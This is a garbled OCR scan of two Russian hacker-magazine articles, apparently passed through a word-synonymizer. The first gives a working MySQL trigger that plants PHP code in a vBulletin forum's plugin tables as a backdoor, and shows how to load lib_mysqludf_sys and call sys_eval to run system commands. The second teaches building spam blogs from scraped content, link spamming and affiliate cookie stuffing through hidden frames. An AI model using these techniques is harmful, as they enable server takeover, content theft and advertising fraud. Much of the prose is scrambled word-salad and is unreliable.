MySQL версий накануне 0.1 .6 нужны nривилегии SUPER, nосле 0.1.6- nривилегия TRIGGER.

создания хранимой nроцедуры, функции либо

Синтаксис триггера баста nр в отношении ст:

работать. Это позволено предпринять вместе с nомощью

CREATE [DEFINER={ nользователь 0 CURRENT_USER }] TRIGGER trigg_name trigg_time trigg_event ON tЫ_name FOR ЕАСН ROW trigger_body

указания всех таблиц во явном виде <«имя

0.

ко которой они относятся равно из которой будут

триггера исnользуются оnераторы CREATE

PROCEDURE, CREATE FUNCTION равно CREATE TRIGGER соответственно. Вызов хранимой nроцедуры nроисходит со nомощью оnератора

CALL . Функции вызываются с оnераторов

Лучше наnрямую показывать базу данных,

конструкции

<<USE <имя базы данных»> либо — либо

базы данных>.<имя таблицы»>.

0.

безошибочно где-то же, вроде равно любые иные функции, ведь

При исnользовании множественных оnераторов на теле nроцедуры необходимо иметь выполнимость отсылки строк заnросов,

очищать посредством направление имени функции [данный

Основные nара метры, которые н ужно з адать nри

содержащих ограничитель '; '. Если наша сестра

событие вnолне может состоять исnользован на SQL

создании триггера, это:

работаем чрез консоль, ведь допроситься

инъекциях), а триггеры вызываются сами, неравно

0.

во БД настуnило некоторое явление [INSERT,

UPDATE, DELETE), nозтому ради нас они будут nредставпять самый большой интерес. Введу

tгiggeг _name- кличка триггера , действительно

сего не возбраняется со nомощью исnользования

можетбытьлюбы м.

команды <<delimiter>>. Если но автор работаем на

0. tгiggeг _time- время, при случае триггер короче вы­ nолнен. Тут возможны неуд з начения : BEFORE да

nоnулярном менеджере баз данных phpMyAdmin, ведь новоявленный ректификатор не грех nросто

AFТER, соответственно, по другими словами nосле заnроса.

обратить на nоле <<Разделитель >> nри создании

Событие INSERT означает вставку новой

Здесь важнецки отметить, что, разве ты да я выставили

nроцедуры, команду <<delimiteг>> во этом случае

строки во таблицу равным образом реализуется одним изо

tгiggeг _time во BEFORE, в таком случае триггер хорошенького понемножку вас nол-

исnользовать безграмотный нужно.

уточнения:

Как заметно изо тела триггера, на соответствующем nереональном

дамnы. После изучения различий сделанных нате nредыдущем шаге

сообщении автор сможем выискать авторизационные способности любого

дамnов становится ясно, почто nлагин вместе с именем

зарегистрированного получи форуме nользователя. Данный nрием дозволяется

адрес

nрименять nрактически с целью любого форума, работающего вместе с

MySQL 0.

aj4x, содержащий <<print_r(ini_get_all{)) >>, бросьте создан nосле выnолнения следующих SQL заnросов:

Для сего нужно просто-напросто только лишь отыскать таблицу от авторизационными данными юзеров равно таблицу не без; текстами nереанальных сообщений. При исnользовании триггеров нас далеко не крепко интересует логика форумного движка, приближенно в духе по сию пору маниnуляции nроисходят держи уровне базы данных .

INSERT INTO 'datastore' VALUES ( 'pluginlist' , 'a:1:{s :13: "ajax_complete";s:25: "print_r(ini_get_all() ); \r\n\";}' ,

0 ); КРОШИМ «БУЛКУ» Также триггеры дают нам nрекрасный надежда nо-новому осмыслить давно известные уязвимости. Наnример, на админ-nанели форума

INSERT INTO 'plugin'

РНР-кода на nлагины. Этот быль позволено считать в качестве кого эластичный

( 'pluginid' , 'title' , 'hookname' , 'phpcode' , 'product' , 'devkey' , 'active' , 'executionorder' )

снасть про админа в области расширению функцианала форума, хотя

VALUES

мы, да же, будем исследовать его на правах уязвимость:). В дан­

( 0 , 'aj4x' , 'ajax_complete' , 'print_r(ini_get_all());' , 'vbulletin' ,

vBulletin 0 nрисутствует вероятность вставки nроизвольнога

ном случае такая небезукоризненность склифосовский группироваться равно как «post

auth Admin Panel Code Execution >>. Как твоя милость еще принуждён был nонять,

0 , 0);

формировать nлагины из РНР-кодом дозволительно отнюдь не исключительно с админки, но и равным образом при помощи базу форума. Чтобы nонять, во вкусе сие учинить из базы, тебе совсем безграмотный нужно усваивать километры кода, а должен

При этом, разве пишущий сии строки обратимся ко файлу vb foгuma . net/ajax . php , то свой шифр на nлагине усnешно выnолнится! Такую технику вnолне

равно полно произвести двушничек дамnа БД: дамn, когда-никогда nлагинов вновь

не грех исnользовать в целях создания триггера, кто во случае

нет, равно дамn зараз nосле добавления любого nлагина не без; nомощью

что-что nозволит выnолнить шифр держи нужном нам форуме . Однако

оnисанного перед этим триггера. Затем тебе нельзя не поставить в один ряд сии

поручать nлагин не без; nодозрительным рhр-кодом получи долгие годы во

060

ХАКЕР 01 / 054/ 0011


Бэкдор во БД

СТАРЫЕ ТРЮКИ С

LIB_MYSQLUDF _SYS

UDF

·~-...~~ 0- e~r~utes

~У."

.. ~...- - @XKUt~ an a rЫtrary

равным образом на побольше ранних версиях MySQL [еще перед появления хранимых

т

?,.,. - get!O ttle value. of o.n envlronment Yart.1Ыe.

процедур на этой СУБД! про поддержки эдак называемых UDF

• ~~- ~t •

Важно отметить, аюшки? телефонист

CREATE FUNCTION использовался

an arЬitrarv command, and I'@'Wms lt's output. comm.1nd, and returns lt''!l ~xlt code.

crute an envlronment

varlaЫe,

or upd.JI.c the value of an eal5ting en Yironment

Yilllri<IЬie.

[определенные пользователем функции!. UОF-функции продолжают поддерживаться

MySQL да могут рассматриваться

на правах внешние хранимые функции . В орден через обычных хранимых

rp_ev11l -'Y=_c•<Jl tlkes

ом

c;omm.and wtng

iii''IJUПient

0nd

• • кutes

lt. Jeturnlng 01:5 outpyt.

функций, которые в соответствии с сути состоят изо нескольких SQL-операторов,

UDF-функции могут несравнимо распространять функциональность СУБД . Несколько планирование обратно широкой публике был представлен

Описание б иблиотеки

lib_mysqludf_sys нате

от айте

mysqludf.org

эксплоит, представляющий из себя UDF-функцию, которая позволяла производить команды операционной системы. Все зто относилось для

MySQL 0- пятой версии тем временем пока что без затей малограмотный было. Со

временем подобная функциональная была реализована изумительный вполне легитимном модуле

LIB_MYSQLUDF_SYS,

каковой немедленно доступен

для того загрузки со специального ресурса, посвященного

FOR ЕАСН ROW BEGIN IF NEW.pagetext='mynewtestdata' THEN SET @exists_plugin=(SELECT data FROM 'vb' . 'datastore' WHERE 'datastore' . 'title'='pluginlist' );

UDF-

фунциям [ mysqludf.oгg l. Библиотека заключает на себя гряда функций , позволяющих взаимодействовать вместе с операционной системой, на которой запущена СУБД . Учитывая простоту во установке

UDF-

UPDATE 'vb' . 'pmtext' SET 'message'=@exists_plugin WHERE 'pmtext' . 'title'='aj4x' ;

функций, сие полностью действительный средство почерпнуть посещение ко системе.

Делается сие так:

0.

DELETE FROM 'vb' . 'datastore' WHERE title='pluginlist' ;

Достаточнолишь со валять от указанного перед этим сайта [или не без; нашего

диска! картотека lib_mysqludf_sys_O.O.З . taг.gz, обнаружить затем уж скомпи­ ленный бинарник равно свести его на диpeктopию/usг/lib/mysql/ plugiпs.

INSERT INTO 'vb' . 'datastore' VALUES ( 'pluginlist' , 'а :1:{s:13: "ajax_ccщ:>lete"~s :23: "print_r(ini_get_all() ); ";}' , 1 );

0. Далее на базе данных никуда не денешься нагнать следующую команду: DELETE FROM 'vb' . 'plugin' ; CREATE FUNCTION sys_eval RETURNS striпg SONAME 'lib_mysqludf_sys.so' ; 3. После чеготебе станется доступна цель sys_eval, позволяющая выполнитьлюбую системную команду:

select sys_eval ( 'id' ) uid=60(mysql) gid=107(mysql) groups=107(mysql),e(root) Данный метода может статься бы во всем хорош, однако, во нем кушать одно большое но: директории, на которых нужно помещать обложка

lib_ mysqludf_sys.so, доступны держи протокол лишь суперпользователю, позтому таковой план не возбраняется исследовать лишь вроде установку

INSERT INTO 'vb' . 'plugin' ( 'pluginid' , 'title' , 'hookname' , 'phpcode' , 'product' , 'devkey' , 'active' , 'executionorder' ) VALUES ( 0, 'aj4x' , 'ajax_complete' , 'print_r(ini_get_all());' , 'vbulletin' , " , 0, 0); END IF; END~

Связав нынешний триггер от базой форума, создав бери форуме позиция вместе с

бэкдора, а неграмотный градиент атаки. Хотя, конечно, даже если админ накосячил

секретным одно слово <<myпewtestdata >> равно дальше обратившись для скрипту

справами [например, правительство /usг/lib/mysql/plugiпs имеет

ajax.php, наша сестра увидим, почто код, дополненный нами во плагин , успешно

компетенция

выполнится!

0771,

а я около этом имеем приступ во базу из привилегией

FILE, в таком случае весь можем постараться учредить обложка lib_mysqludf_ sys.so от через по всем статьям известной конструкции <<SELECT .. .. INTO OUTFILE ». Также, даже если установленный обложка хорэ скомпилен

Понятно, что-то с целью использования любых трюков со триггерами да

получи и распишись похожем сервере, ведь от немалый долей вероятности не возбраняется

хранимым процедурами кушать важное условие- у нас поуже в долгу

ВМЕСТО ЗАКЛЮЧЕНИЯ

предстоять успешного выполнения системных команд равным образом в целевой

фигурировать ход ко СУБД. Для сего надобно овраг ан да параль какого­

машине . Использовать функцию

либо MySQL-юзepa. Зачастую показатели пользу кого соединения со сервером

sys_eval

нам может расстроить

программный снаряд упреждающей защиты АррАгmог, но,

БД не мудрствуя лукаво хранятся на РНР-скриптах во открытом виде. Даже буде

неравно у нас кушать рутный доступ, сие помеха аспидски мелочёвка

веб-приложение накрыто Zепd'ом либо закриптовано loпCube,

обойти, ссылку в манера обхода ищи во сносках .

конфиг, идеже естественным путем прописывают лаги н да параль через базы данных, остается доступен пользу кого редактирования, с тем еще непосредственно конечный пользователь был в силах платить на него необходимые изменения. Поэто­ му, неравно враг каким-либо образом может скандовать файлы

базе форума отнюдь не является правильным решением, беспричинно во вкусе сие подумаешь

нате сервере, то, вернее всего, дьявол найдет равно конфиг из доступами для БД.

может найти админ. При создании триггера приходится принимать во внимание

Далее, буде на базу пускают чей угодно, а безвыгодный всего-навсего не без;

те плагины, которые сделано были во базе данных по нашего инжекта,

иначе нате часть а сервере находится специализированный софт к

localhost,

почему желанный адрес триггера во таком случае довольно казаться

работы из БД [например, оный а самый phpMyAdmiпl, то, получив

эскизно так:

способности с конфига приложения, программист полностью может попасть да

CREATE TRIGGER 'vb_pluggin' BE FORE INS ERT ON 'vb' . 'post'

условии проникновения в хает часто невыгодный является сверхслож­

во саму базу данных . Короче говоря, сбор доступа ко БД присутствие

ХАКЕ Р

01 /154/2011

утнапиштим задачей. ::Х:

06 0


вэпом

RushteR (rushter.coml

ess ото А предварительно Я

получи и распишись Word

AKCOЗiJ.ATb

СВОЙ nlfP.BЫЙ СПАМ-БЛОГ И НА НЕМ ЗАРАБОТАТЬ Если у тебя кушать кровный сайт либо блог, то ты кровь из зубов был способным заметить, в качестве кого часть

сайты автоматом копируют твой контент, тем самым отнимая твоих

• Известный симпозиум насчёт доменах: gQ!МJ)J.QrJHJ1.fi~l • Известный SEO форум: ~~·LY

• Сервиспроверки траста xt Яндексе:

ШШц • Интересный блоr по отношению из-за раб интернете:

'

~ _р

• Качественный nоказатель посещаемости сайта :

i!l~~

• Сплоrи Q.i! yjor

для Википедии:

Сервисы

AddUrl

~·.., · ~

•Google: •GoGo: •WebAita:

сплогами. Если существовать точнее, в таком случае сие

• Yahoo:

ради вычисление других ресурсов. Как они

создаются?

сиречь аддурилки:

•Яндекс:

посетителей. Такие сайты называются

обычные паразиты, зарабатывающие

во

•RamЫer:

tlr

( 1 \

\


Сплоги бери WordPress ото А впредь до Я

О МЕНЫ Минимум теории . Сплог- сие сайт-блог, разработанный в целях раскрут-

Следующий вопросительный знак - предпочтение домена пользу кого сплога. Тут поглощать пара пути:

ки других сайтов. По своему виду симпатия похож держи всегдашний блог, хотя

прописка свежих сиречь выкуп драп-доме н ов. Со свежими домена­

первооснова знак заключается во контенте, тот или иной отнюдь не является ни

ми проблем гора н икнуть отнюдь не должно: шелковица всегда стандартно. Могу только лишь

качественным, ни уникальным. Как правило, сущность сайта сге­

натолкнуть выделять зону, исходя изо языка , лещадь что делается

нерировано всецело непроизвольно не без; использованием RSS-лент

сплог. Также преимуществом достаточно касание тематического языкоблудие

либо — либо прямого парсингадругих ресурсов . В целом но схему создания да

на имени домена. Интереснее переделка из « дропами >>. Это домены,

монетизации такого сайта не возбраняется поведать во 0 шага х:

никак не продленные бывшим хозяином и, таким образом, доступные ради

0. 2. 3.

Создается сплог;

регистрации любому желающему. «За нежели нужен дроп? >>, - можешь

Идет быстрое другими словами постепенное заваливание сплога

не без; выклянчивать твоя милость . Все просто: сайт, находившийся нате этом домене, имел

чужим контенто м;

по отношению пределенный урез доверия со стороны поисковых систем вслед за отсчет

Выбираетсяпутьзаработка[баннеры,партнерки,

входящих держи него ссылок, ведь очищать рядом новой регистрации сии ссылки

передвижение други х сайтов да т.п.l;

перейдут для новому хозяину. А сие многого стоит!

0. Ус танавливаются соответствующие не без; крипты чтобы выбранного

Для поиска дозволено пустить в ход замечательным бесплатным сер висом justdгopped.com . Но советую никак не маяться вместе с поиском дропов,

пути следовать работка;

0. Начина е тся раскрутка сплога на поисковых системах; 6. Сплогумирает; 7. Переходим назад для пункту 0.

а попросту обнаружить людей, которые продают информацию относительно таких до­

менах вслед деньги. П ри использовании дро п ов нужен пусковой опыт, так во вкусе вкушать большенный случай накопить -де н ьги во п устую, п оэтому сразу начинать со них безграмотный стоит. Простой имей сие во виду.

В этом материале аз многогрешный хочу тронуть аспекта создания сплога да его

КОНТЕНТ

монетизации. И первое, из зачем пишущий сии строки начнем,- э так одно изо двух платформы

Основная образ сплога во том, сколько контент для того него генерируется

с целью размещения сп лога.

автоматично [или полуавтоматически!. Основным источником

ПЛАТФОРМА

ко нтента чтобы от плогов являются RSS-фиды. Обычно их используют

Есть двойка варианта : бесплатные блогохостинги тож личный

<< равно как лакомиться >>, а бывают случаи, эпизодически контент проходит синонимиза­

хос тинг со своими доменами . В качестве блогохостинга твоя милость можешь

цию, ручную редакцию или — или самозарядный перевод. Если нужны

проэксплуатировать Ыoggeг.com , livejouгпal.com тож woгdpгess.com . Эти сер­

долгоживущие сплоги, ведь к введение паче запретить копирайтили

висы являются бесплатными да самыми популярными промеж сплогеров.

рерайт 00-15 статей у людей в специализированных форумах равным образом

У ни х убирать двушничек огромных п люса: бесплатное применение равно душа

запостить полученные тексты автоматизированный получи близкий спло г во направление

со стороны поисковых систем. Однако вкушать равным образом серьезные минусы :

месяцев. Уникальный ко н тент п оможет спло г у нанять п ервоначаль­

0.

Наличие неиллюзорной вероятности получения ба бери вслед за агрегацию

ный траст, тем самым спло г способен белее во глазах поисковых систем.

В качестве оптимального варианта подойдет контент насчёт д инаковой

контента изо др у гих источников;

0. Отсутствие внутренние резервы подключения плагинов, облегчающих 3.

0-2

тематики, стянутый со большого количества те матических ресурсов

работу сплогера;

равным образом разводненный анонсами. Грубейшая ошибка-парсингвсего лишь только

Потребность на соф те интересах пастин га .

пары-тройки новсетных сайтов. Такие сплоги будут забанены во тече­

Более опытные сплогеры используют личный хос тинг равно

систем. Начинать вместе с большого количества постов невыгодный стоит, раньше

ние туман месяцев, а могут да заключая безграмотный попасть на список поисковы х домены. В качестве хости нга оптимальным решением склифосовский исполь­ зова ние

нужно распределять неграмотный вяще одного поста во будень , а по времени постепен­

vds другими словами своего сервера, беспричинно наравне владельцы shагеd-хостингов

же приумножать объемы постинга. Помимо классических сплогов

вместе с великий вероятностью попросят сплогера съехать с -з а важный

существуют да остальные их виды. Например, в некоторых случаях во качестве контента

нагрузки, генерируемой сплогами. Лучше загодя обезопаситься через

используются вещи изо интернет-магазинов. Такие сплоги любо-дорого

таких проблем. Также никак не игра стоит свеч не вспоминать да об авторских правах. Если

генерируют продажи на партнерских программах. К сожалению, бес­

парсить серьезные источники, ведь могут подоспеть а бузы [официальные

платных вариантов д ля наполнения таких сплогов неграмотный существует, хотя

жалобы! с правообладателей. Очевидно, который злить их далеко не стоит,­

не грех попытать счастья откопать специализированные проги tЬрЗ не ведь — не то

л е гче токмо несложно спровадить запрошенные авторами записи.

для простерах Сети.

ПОЛЕ ЗНЫЕ ДЛЯ СПЛОГА П ЛАГИНЫ

BRush

WORDPR ESS

Xmlsite map

Platinum Seo Pack

WP Super Cache

Popular Posts

Simple Tags

b jЦ y/9Kcq9Z

bjt.ly/QGOMs

Ьj t.J y/2JRrnaq

.!ill.1YLfiQ1

Ьit.J y/1IдGjC

Данный плагин генерирует

Этот плагин улучшает на ну-

Плагин, снижающий зарабатывать

Плагин, кто улучшает

Плагин на автоматическо-

Х МL-карту сайта равно помога-

треннюю SЕ-оптимизацию

грузку держи хостинг. Когда

внутреннююперелинковк~

го создания равно оптимизации

етускорить индексацию бери

твоего блага равно занимает

количествотвоихсплогов

Он выводитсамые популяр-

меток.Позволяетподби-

первых минута х, что-то безусловно вместе с т вдоволь

во-вторых поле по мнению важности на

перевалитза 00, так WP Supeг

ные статьи твоего сплога во

воинство метки равным образом порождать изо

н ять поисковым системам,

делесозданиясплога.Сре-

Cache поможетс у щественно

сайдбаре, тем самым повторение

них такназываемоеоблако

какие страницы важнее.

д равно функций: канонические

сэкономитьрасходование

давая достоинство из главной стран и-

тегов. Также улучшает на ну-

Его регулирование пр оста, кончать

ссылки, оптимизированные

ресурсов. Он может кэширо-

цы держи них . Твой маска дол-

треннюю перелинковку, тем

статоч нолишь а ктивиро-

заголовкистраниц,генера-

вать кое-кто динами-

жен подкреплять виджеты

самым увеличивая трафик.

вать плагин.

ция мета-тегов, перманент-

ческие функции отметина равно

[и настраивается получи и распишись вкладке

Облакоустанавливается во

ный редиректна изменен-

выдаватьнекорректную

настроек виджетовl.

области виджетов .

ные адреса страницы.

информацию нате страницах.

ХАК ЕР

01/154/2011

063


взламывание

ПОИСК RSS-ЛEHT Не достойный выманивать чужие сnиски лент- их нужно комплектовать самому. Одинаковые сnиски лент в всех сnлогах- nлохое решение. Найти

СПОСОБЫ МОНЕТИЗАЦИИ СПЛОГОВ

RSS-ленты позволяется на различных каталогах i subscгibe . гu/ca t alog / ?гss. гsspoгtal.гu ]. При отборе лент хоть лопни nроверять их возьми nолноценность nостов,

0.

Установка заключение контекстной рекламы.

бо отдельный движки nостят лишь только анонсы статей во RSS, а нужны

В качестве контекстной рекламы самое лучшее всего делов исnользоватьGооglе

ленты не без; nолными статьями. Источники кровь из носу должны со­

Adsense. Здесьстоитучесть, чтотакиесnлогидолжны наглядеть

вnадать вместе с тематикой сnлога да далеко не заключать одинаковых статей. К выбору

максимально качественно, если позволительно остаться помимо выnлат. Сnлоги ,

лент стоит только nодходить больно серьезно: nросматривать по мнению 0-5 статей

основанные держи данном nринциnе, называются MFA IMade fог Adsense].

у каждого источника, эдак равно как вnолне может оказаться, в чем дело? сие чей-то

0.

Продвижениедруrихсайтов.

сnлог иначе говоря сайт, кто во каждом nосте рекламирует домашние услуги,­

С nродвижением целое аспидски nросто: nрокачиваем множествосnлогов

такие литература никак не нужны.

схожейтематики равным образом ставим сквозные ссылки сверху ни туды и ни сюды сайтnо нуж­

Сnисок nараметро в, которые нелишне nроверять у сайта­

ным заnросам.

З.

донора:

Количество страниц на индексе больше

Продажассылок. Для nродажи ссылок дозволительно исnользовать сервисы sape . гu либо — либо

Индексация во nоисковых системах;

0. 2. 4. 5. 6.

linkfeed .г u . Для того с тем ссылки раскуnались, у доменадолжен

000;

Количество nубликаций на месяцот5 да выше;

взяться благоустроенный возраст, долговязый тИЦ равным образом оставшиеся SЕО-nоказатели.

Уникальностьстатей;

Также хочу отметить, аюшки? nродажа ссылок-это далеко не самый оптимальный

Отсутствие коротких равным образом бессмысленных статей.

сnособмонетизациисnлогов.Из-заnлохогокачестваконтентата­

Теnерь воnрос- в духе представить сие в одно целое равно автоматом агре­ гировать?

кие сnлоги живут мало да невыгодный усnевают нанять нужные nараметры.

0.

Установка баннеров.

С баннерами всесугубо индивидуально. Находим людей, которым нужентрафик объединение схожейтематике равным образом устанавливаем их баннер. Ставить В качестве сnлогерского блик несомненным лидером является

баннер объединение количествукликов шибко никак не рекомендую, отличается как небо ото земли nродавать

WoгdPгess (альтернативой может оказываться Dгupal тож DLE]. Для ворд­

еготолькоза фиксированную nлату. Стоит отметить, почто никак не любой nо­

nресса снедать единый линия nлагинов, облегчающих формирование сnлогов равным образом

куnател ь захочет скуnать ба н н ер н ы й движение со сnлогов лишь только nотому,

у величивающих число трафика. Основоnолагающий nлагин к

почто этосnлоги :-].

сnлогера- это, естественно же, FeedWoгdPгess. Он nозволяет осу­

0.

Партнерские магазины.

ществлять бессознательный реnостинг изо выбранных RSS-лент. Вот

Исnользование nартнерских магазинов однако вяще да лишше набирает

кой-какие изо его возможностей:

nоnулярность. Сnлоги изначальносоздаются от товарами, да во каждом nосте существуетссылка сверху сайт на их nокуnки.

nоддержка

0. Cookie stuffing.

RSS/Atom;

Также позволено исnользовать технологию cookie stuffing ( Ьit .l y/pObKhh ].

автоматическое организация категорий;

расположение анонса или — или nолной статьи;

Она nозволяет nодставить nартнерские кукинамножество магазинов.

включение/отключение

Для сего полно nодгрузить nартнерский гостиный двор во скрытом

комментариев;

избрание автора;

фрейме. Пользователь, nросматривающий сайты изо выдачи равно выби­ рающий nодходящий ему магазин, может наткнуться в твои сnлоги и,

nакетное добавка лент; отсутствие необходимости

исnользовать

cron.

соответственно, nолучить твои куки. А nосле куnить несколько на одном из твоих магазинов. Кстати, самой nоnулярной nартнерской nрограммой

Так во вкусе сие коренной nлагин, автор оnишу nодробный nлан действий:

0. После установки нужно nерейти на раздел <<Syndication », идеже вы­ бирается nодраздел «Posts & Links >>. В разделе «New posts >> уста­ новим галочку «Hold syndicated posts fог гeview; maгk as Pending >>, а в разделе «Peгmalinks point !о: >> установим галочку наnротив «The local сору оп this website >>. Не забываем сэкономить до этого времени сделанные

пользу кого nродажи реальныхтоваров является тотсамый

nредварительно найденные объединение моим советам, инажмем кноnку

«Add >>. После зто го nлагин nроверит достоверность источников и nредложит nодnисаться нате них. Нажимаем «Subscгibe to selected

изменения.

0. Теnерьдобавим список источников RSS, пользу кого сего моя особа советую восnользо­ ваться встроенной nакетной функцией «add multiple>>, которая на­ ходится получай вкладке <<Syndication >>. Вставим тама сnисок RSS-лент,

Amazon.com, ино­

гда nроцентная тариф со nродаж сверху нем доходит вплоть до 05%.

гesouгces >> .

0. Далее выбираем добавленные блоги во сnиске «Syndicated гesouгces >> равным образом нажимаем <<Update checked >>. Чем свыше сnисок, тем дольше обновление, nоэтому nридется капельку nодождать.

Product Category

Fixed Advertising Fee Rates

Electronics Products

0.00%

Amazon

МРЗ

Products

0.

Из-за настроек nервого nункта до сей времени заnиси будут предчувствовать nроверки, nоэтомустоитвручнуюустановитьвремяnубликацииираскидать зти заnиси для nостинг на перемещение

0.

0-2 месяцев.

После того, как бы nройдет 0 месяца, нужно обернуть настройки nерво­

00.00%

го nункта обратно. Первый равно nятый nункты дозволено равно невыгодный выnолнять,

Amazon Video On Demand Products

00.00%

да автор рекомендую безграмотный пускаться новейший сnлог вмиг со большого коли­ чества заnисей.

Game Downloads Products

00.00%

Endless.com and smallparts.com Products

05.00%

Gift Cards RedeemaЫe on the Amazon Site

0.00%

Процентные ставки сверху

06~

Amazon.com

Помимо FeedWoгdPгess принимать целешенький галерея других nолезных рас­ ширений, которые моя персона nривел изумительный врезке. Главный nроблемой связки WoгdPгess равным образом nлагинов является большая нагрузка, которую, вnрочем, не грех немного ухлопать не без; nомощью nлагинов про кэши­

рования. Могу принести уже порядочно советов. После установки соот­ ветствующей CMS самое лучшее разом отключить достижимость комменти­ рования. Также паче спрятать

RSS alias nостить тама всего анонсы

ХАКЕР

01/154/2011


взламывание

Запланированные обковпеюUI Последнее обновление:

0 ми горох ago

СледУющее обновление:

обнов11Ть no rрафшсу (every 00 minutes)

График обновлений :

Ка ко ложбина го

@

G

FeedWordPress долже н ожидать ,

n ока л е нта б)'Ает roro на a ко обновn ен шо?

Иа1оль зо ваrь общие н астрой ки (c:eliчa c

б Ждать

00

00 м 01нут)

микут междУ об н по отношению вл ен ltЯ 0..4 01 .

Ре.:оuендацмя . П ока во ы н е уве р е н ы, на ы н е должны н астр а1t вать

FeedWordPress для об н что касается вл е н 01& чаще нежели единожды е 00 минуr.

Мн оn•е ве бм асте ра счита корма частые з аn росы н а обно вn е н 0tе е редон в рассуждении сн ыt.ш АПЯ сер еера

да мo ryr nожал касательно ваться возьми ва с. вnлотъ перед ба н а ва шего аккауктэ нате ХОСТ11 нrе .

Замечание. настро й ки

Fe edWordPress nо-умопча н аtю исnользуют ради ма н11роеанн ое обно еn ен • t е тротил ь коесnи nентэ н е безусловно ет нщсакшс данн ых что касается б обн оаленшu.. Ecn11 кинолента nредоставляет 0\ Нф насчёт рмаци ю о ), FeediNordPress бm,ет 0tсnользо взтъ эщ Аанные .

з ама н аt ро ванн ом об н овлени равно (ч ер ез та каковой эле м ент, равно как < гss : ttl > иmt < S y :update.Fгe.que.nc y>

Настрой ко равным образом обновл ения

FeedWordPress

НА ЧЕМ ОСНОВАН Т РАСТ ПОИСКОВЫХ СИСТЕМ? Е со ть н нашел колько чета метров , влияющих получи уровеньдоверия поисковиков.

0.

0.

З.

0.

0. 6.

Время нахожде н ия во индексе .

ЗАРУБЕЖНЫЕ ВЕБМАСТЕРЫ УЖЕ ДАВНО ОТОШЛИ ОТ ТЕМЫ ДОРВЕЕВ В ПОЛЬЗУ СПЛОГОВ бы от тро надоес т ь , п оэтом у со тоит собрать немно го денег получай из п е­

Чем длительнее сайт находится на индексе поисковой системы, тем

циализирова н ные пр относительно граммы

вне степеньдоверия ко нему.

сервисы социальных закладок » !. В качестве д в рассуждении полнительного вместе с п человек

[Google -7 « Автоматический пастин г на

Ссылк равным образом н а са йт.

п об п адания во колориндекс допускается на в из триада х св ое й

Чем пуще естественных, а отнюдь не покупных ссылок, ведут держи сайт,

у п равления контентом автор сих строк погов насчёт рим ниже! приплюсовать сервисы интересах

CMS [ по отношению выборе сис т емы

тем ранее поисковые системы его оценивают.

RРС - пинга [ равным образом х со писок тоже л е ж ит для диске!. В WoгdPгess настройки

Внешни е сс ы лки .

RPC

Чем более сверху сайте внешних ссылок , тем меньшеуровень доверия.

токол

Качество сайта:

поле. Е вместе с л равно е из ть нет слов з дозволительно из ть на пр касательно ставпения << жирных >> [трастовы х

• неформат да насущность контента; • исключительность стр у ктуры; • внутренняя оптимизация; • быстрота загрузки страниц; • валидный синтаксис HTML; • присутствие контактов от админами/разработчиками.

да пиар ис твоя милость хl сс ылок , ведь накануне равным образом нде для сацией в обязательном порядке п роставить

н ахо дя тс аз многогрешный сверху вкладке << Напи от ани е » : з дескать из ь н у жно привнести пр что касается ­

XML-RPC равно

вмонтировать спис касательно для п рил по части ж е нны х мной сл у жб на нижнее

нескольк по отношению та ких от вместе с ылок получай главн у ю стра н ицу равно Н Т М L-карту сплога. После индек от ации позволено плав н в отношении у величивать наличность на х одящих с не без; ылок. Прокачиваем главн у ю равно из ами посты. П осле так го, как бы со пл об г

п рожив ет

0-3 месяца , допускается п рос памить его сообразно ф что касается р у мам или — или благ ам. 50-60 % с во сех ссылок получи оnубликованные п осты да

Лучше однако го позаимствовать

Посещае м волос са й та .

проспамить равно х любым дост у пным от офтом [ н аверняка твоя милость слышал оборона

Дру г ие факторы .

Xгumeгl . Так но у становим маркер вместе с та т истики, ко п римеру, l i veinteгnet. Такой сче т чик nо з волит признать достоинства сумма равным образом качес т закачаешься посетителей.

Ни одна с поисковых систем в жизни не отнюдь не раскроет аб со олютно

П относительно мере ро не без; та вместе с пл об га тебе б удочка ет видно, от каких со т раниц так тому и быть относительно вместе с новно й

на не без; е факторы, влияю щ ие н а уровен ь доверия ко тому иначе говоря иному сайту,

затор . С насчёт вет ую вз глян у ть для п эскер иции сих не без; т раниц во п в отношении ис ко овы х

поэтом у тебе ос т ается едва экспериментировать.

системах . Е вместе с ли период малограмотный н ахти одится во топ-5 , ей т об чн по отношению малограмотный помешают хорошие вх касательно д автор щие ссылки.

ста т ей. Это позволит ради щ ититься с плохого влияния возьми сплоги со

После установки сумме описанного вне стаффа равно выпол н ения на­

стороны других вебмастеров.

меченного плана по мнению раскрутке от мело позволительно п испытывать различ ­

ные не без; пособы монетиза ц ии !см . врезку!. И ... пристуnать для созданию следующего сплога. В любом случае, отдельный свежеиспеченный спло г- сие

Неотъемлемой составляющей сплогов является шаблон. Не овчинка выделки стоит

что-нибудь творческое да неповторимое. Н икто малограмотный расскажет тебе подготовленный

уделывать мало-мальски сплогов в од н ом шаблоне, в такой мере вроде поисковые

ре ц епт. В ага н ном случае могу только лишь натолкнуть уподобляться по мнению

системы был способным у т nриня т ь

от п ециализированным форумам с сносок-там п что касается крупицам дозволено

не без; п логи после нехорошую спамерскую сетку.

Л учшим вариантом хорошенького понемножку использова н ие единственно г что до шаблона или — или

отлично передела н же г что до бесплатного. Если безграмотный тянет самому

выудить нужную равным образом актуальную сплоговую информацию. В этой вместе с татье мы описал простейший конфигурация интересах получи ч инающих

свершать шабло н ы, другими словами н е хватит зна н ий к сего , позволено от валять

сплогеров. Зарубежные вебмастеры сделано давненько от ш ли с темы

бесплат н ые- получи и распишись п ример, не без; xtemplate.гu alias Ыogstyle.гu . Также отнюдь не

дорвеев во польз у сплогов. Их прибыль очевидна, они накануне этих пор

забываем предотвращать спрятанные ссылки и, возможно, бзкдоры на их

приносят х ороший зарабо т ок, неграмотный используя подле э т ом никаких

коде [в бесплатных шаблонах что вместе с п рята н ы линки, из через

противозаконных технологий , на медаль через сей д няшних технологий

которых нечестные вебмастеры прокачивают близкие сайты l .

изготовления дорвеев. Минусом качественных сплогов является nо­

требность во кустарный работе, объединение з тому тогда возникает геморрой не без; мас­ совым nроизводством. Если твоя милость реши л зачать брать уроки сплогами ,

Каждый веб-мастер во основном придерживается собственной стра­

т об решай: массовость, однако не без; большим численностью ба нов со от т ороны

тегии пользу кого продвижения своих ресурсов, ваш покорнейший слуга только что расскажу в рассуждении самом

п оисковы х систем , равно л равным образом но штучная, только качественная работа. Также

ос н овном . П ервым делом нужно попасть на числовой показатель поисковых систем,

от что касается ветую невыгодный замяться сверху беспла т ных решениях , описан н ых

с целью аюшки? не грех ис п ол ь зовать их встроенные AddU г l сервисы не ведь — не то про­

